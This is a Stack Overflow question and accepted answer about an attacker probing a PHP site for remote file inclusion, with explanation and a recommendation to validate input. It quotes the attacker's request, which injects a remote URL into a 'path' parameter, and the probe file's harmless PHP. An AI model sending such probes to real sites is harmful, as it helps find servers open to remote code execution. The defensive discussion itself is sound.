A guy called ShiroHige is trying to hacking my website.

He tries to open a page with this parameter:

mysite/dir/nalog.php?path=http://smash2.fileave.com/zfxid1.txt???

If you look at that text file it is just a die(),

<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

So what exploit is he trying to use (WordPress?)?

Edit 1:

I know he is trying use RFI.

Is there some popular script that are exploitable with that (Drupal, phpBB, etc.)?

Comments

RFI (remote file inclusion)

Written by knittl

how did you track his tries?

Written by usef_ksa

404 errors..... If you look at your 404 log you may find some very useful informations

Written by yes123

Here's some Trivia. Shiro Hige is a character in the Japanese anime One Piece. It is translated to "Whitebeard". :-)

Written by eml

Accepted Answer

The vulnerability the attacker is aiming for is probably some kind of remote file inclusion exploiting PHP’s include and similar functions/construct that allow to load a (remote) file and execute its contents:

Security warning

Remote file may be processed at the remote server (depending on the file extension and the fact if the remote server runs PHP or not) but it still has to produce a valid PHP script because it will be processed at the local server. If the file from the remote server should be processed there and outputted only, readfile() is much better function to use. Otherwise, special care should be taken to secure the remote script to produce a valid and desired code.

Note that using readfile does only avoids that the loaded file is executed. But it is still possible to exploit it to load other contents that are then printed directly to the user. This can be used to print the plain contents of files of any type in the local file system (i.e. Path Traversal) or to inject code into the page (i.e. Code Injection). So the only protection is to validate the parameter value before using it.

See also OWASP’s Development Guide on “File System – Includes and Remote files” for further information.

Written by Gumbo
This page was build to provide you fast access to the question and the direct accepted answer.
The content is written by members of the stackoverflow.com community.
It is licensed under cc-wiki